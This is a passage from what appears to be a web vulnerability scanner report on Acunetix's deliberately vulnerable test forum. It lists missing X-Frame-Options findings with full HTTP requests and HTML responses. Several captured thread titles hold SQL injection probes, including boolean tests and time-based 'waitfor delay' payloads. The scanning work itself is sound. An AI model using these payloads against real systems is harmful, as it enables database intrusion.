style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=44 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=44 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:43 GMT Content-Length: 4207 |
Response Body - size: 4,207 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1" OR 3+781-781-1=0+0+0+1 -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D44" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1" OR 3+781-781-1=0+0+0+1 -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:54 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1" OR 3+781-781-1=0+0+0+1 -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=45 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=45 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:43 GMT Content-Length: 4201 |
Response Body - size: 4,201 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1" OR 3*2<(0+5+781-781) -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D45" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1" OR 3*2<(0+5+781-781) -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:54 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1" OR 3*2<(0+5+781-781) -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=46 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=46 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:43 GMT Content-Length: 4201 |
Response Body - size: 4,201 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum -1" OR 3*2>(0+5+781-781) -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D46" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/-1" OR 3*2>(0+5+781-781) -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:54 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>-1" OR 3*2>(0+5+781-781) -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=47 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=47 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:43 GMT Content-Length: 4201 |
Response Body - size: 4,201 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 1 waitfor delay '0:0:15' -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D47" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/1 waitfor delay '0:0:15' -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:55 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>1 waitfor delay '0:0:15' -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=48 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=48 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:43 GMT Content-Length: 4228 |
Response Body - size: 4,228 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum UGrs47CJ'; waitfor delay '0:0:15' -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D48" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/UGrs47CJ'; waitfor delay '0:0:15' -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:55 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>UGrs47CJ'; waitfor delay '0:0:15' -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=49 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=49 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:43 GMT Content-Length: 4231 |
Response Body - size: 4,231 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum KHr20UMM'); waitfor delay '0:0:15' -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D49" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/KHr20UMM'); waitfor delay '0:0:15' -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:55 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>KHr20UMM'); waitfor delay '0:0:15' -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=5 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 344 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=5 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:40 GMT Content-Length: 4137 |
Response Body - size: 4,137 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:50 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>showforum.asp/.</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr 